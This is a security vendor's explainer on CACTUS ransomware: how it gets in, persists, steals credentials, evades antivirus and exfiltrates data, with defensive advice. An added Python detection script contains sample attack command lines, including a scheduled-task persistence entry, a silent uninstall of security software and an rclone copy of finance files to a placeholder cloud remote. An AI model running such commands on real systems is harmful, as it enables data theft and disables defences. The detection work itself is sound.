CACTUS Ransomware

CACTUS ransomware is a malware strain that was first discovered in the wild in March 2023. Its name is based on the ransom note that it places on victims’ computers, which is named cAcTuS.readme.txt. The malware also creates encrypted files with the .cts1 extension, where the number at the end of the extension can vary.


How Does CACTUS Ransomware Work?

CACTUS ransomware usually exploits vulnerabilities in virtual private network (VPN) software to gain access to a target environment. After gaining access to the system, the malware establishes command and control (C2) communications with its operator via SSH. It also takes advantage of Scheduled Tasks on the infected system to maintain persistence across reboots.

With a footprint on the target network, the malware uses network scanning to identify potential targets for infection on the network. It then uses various methods to steal user credentials, such as collecting them from web browsers and dumping them from LSASS. These compromised credentials are then used to gain the required level of access to perform the attack. This includes adding or accessing accounts on remote devices that the malware can use to spread itself through the network.


Once on a device, the malware uses msiexec to uninstall common antivirus software. It also employs several anti-detection techniques, including distributing the malware in an encrypted form that requires an AES key to unpack. This is likely intended to hinder analysis: researchers and sandboxes may not have obtained the decryption key alongside their copy of the sample, or may not know the configuration parameters required to trigger its malicious functionality.

CACTUS is an example of a double-extortion ransomware variant. In addition to encrypting data — with a combination of RSA and AES — the malware also attempts to exfiltrate it. It has been observed to use Rclone for this, which moves stolen files to cloud storage. Once encryption and exfiltration are complete, the malware posts ransom notes on the user’s computer.
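The behaviours described above (Scheduled Task persistence, msiexec uninstalling security software, Rclone exfiltration) and the file artifacts named at the top of the page (the cAcTuS.readme.txt note and the .cts<N> extension) can be turned into a simple host-triage check. The following is an added illustration written for this page, not Check Point code or a published detection rule; the command-line regexes, host names and sample events are constructed assumptions, and the product GUID and bucket name are placeholders.

```python
import re

# Filename indicators taken from the page: the ransom note cAcTuS.readme.txt and
# encrypted files carrying a .cts<N> extension, where N varies between samples.
RANSOM_NOTE = "cactus.readme.txt"
ENCRYPTED_EXT = re.compile(r"\.cts\d+$", re.IGNORECASE)

# Command-line patterns mapped to the stages the page describes. These regexes are
# assumptions for illustration, not signatures published for CACTUS.
STAGE_PATTERNS = [
    ("persistence: scheduled task", re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b", re.I)),
    ("defense evasion: msiexec uninstall", re.compile(r"\bmsiexec(\.exe)?\b.*\s/x\b", re.I)),
    ("exfiltration: rclone to cloud storage", re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I)),
]

def is_cactus_artifact(path: str) -> bool:
    """True when a file name matches the ransom note or the .cts<N> extension."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    return name.lower() == RANSOM_NOTE or bool(ENCRYPTED_EXT.search(name))

def classify_cmdline(cmdline: str):
    """Return the first matching stage label for a process command line, or None."""
    for label, pattern in STAGE_PATTERNS:
        if pattern.search(cmdline):
            return label
    return None

def triage(events):
    """Group matched stage labels by host over (host, cmdline) process-creation events."""
    stages = {}
    for host, cmdline in events:
        label = classify_cmdline(cmdline)
        if label:
            stages.setdefault(host, set()).add(label)
    return stages

def escalate(events, min_stages=2):
    """Hosts showing at least min_stages distinct CACTUS-like stages, sorted by name."""
    return sorted(h for h, s in triage(events).items() if len(s) >= min_stages)

# Constructed sample events (not real telemetry); GUID and bucket are placeholders.
SAMPLE_EVENTS = [
    ("ws01", 'schtasks.exe /create /tn "UpdateTask" /tr "C:\\ProgramData\\x.exe" /sc onstart'),
    ("ws01", "msiexec.exe /x {PLACEHOLDER-PRODUCT-GUID} /qn"),
    ("ws01", "rclone.exe copy C:\\Share\\Finance remote:placeholder-bucket"),
    ("ws02", "msiexec.exe /i installer.msi /qn"),  # ordinary install; must not match
]

if __name__ == "__main__":
    print(escalate(SAMPLE_EVENTS))  # hosts that hit two or more stages
```

A single msiexec or schtasks invocation is routine on most fleets; requiring two or more distinct stages on one host, as `escalate` does, keeps the check from paging on normal administration.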

What Does CACTUS Ransomware Target?

CACTUS ransomware uses known VPN vulnerabilities to gain access to its victims, which limits its pool of potential targets to those organizations using known vulnerable VPN appliances. Additionally, CACTUS has primarily been observed to target large enterprises, which have the resources required to meet a large ransom request.

How to Protect Against CACTUS Ransomware

CACTUS is an example of a ransomware variant designed to attack corporate networks while using various evasion techniques to fly under the radar. Some security best practices that organizations can implement to protect against this threat include:

  • Patch Management: CACTUS ransomware primarily infects systems by exploiting known vulnerabilities in unpatched VPN systems. Promptly applying updates and patches when they become available can prevent the malware from using this access vector.
  • Strong Authentication: This ransomware often attempts to steal credentials from browsers and LSASS to gain the access and privileges necessary to carry out its objectives. Implementing multi-factor authentication (MFA) for user accounts can prevent CACTUS from using the passwords it steals from an infected computer.
  • Employee Education: CACTUS attempts to exploit password reuse by dumping passwords from various sources on an infected computer. Training employees on account security best practices can help to reduce or eliminate this threat.
  • Network Segmentation: CACTUS attempts to move laterally through the network by using accounts that it created or compromised from an infected computer. Network segmentation isolates high-value systems from the rest of the network, making them more difficult for an attacker to access.
  • Network Security: This ransomware uses network scanning and remote access tools to move through the network. Network monitoring and security solutions can identify and block these attempts at lateral movement.
  • Anti-Ransomware Solutions: CACTUS attempts to encrypt sensitive files and exfiltrate them via cloud storage. Anti-ransomware solutions can identify this malicious behavior and eradicate the malware infection.

Prevent Ransomware Attacks with Check Point

Ransomware has become one of the most significant threats to organizations’ data, reputation, and bottom line. The modern ransomware attack not only threatens access to data via encryption but also incorporates data theft and shaming to increase the pressure on organizations to pay the demanded ransom.

However, ransomware like CACTUS is only one of several cybersecurity threats that companies face. To learn more about the extent of the current cyber threat landscape, check out Check Point’s 2024 Cyber Security Report.


Check Point Harmony Endpoint offers organizations the tools that they need to protect against ransomware and other potential threats to their endpoints and data. Its prevention-focused approach to security is designed to identify and eradicate the threat before it can encrypt or leak sensitive data. To learn more about Harmony Endpoint’s capabilities and how it can enhance your organization’s defenses against ransomware, request a free demo.
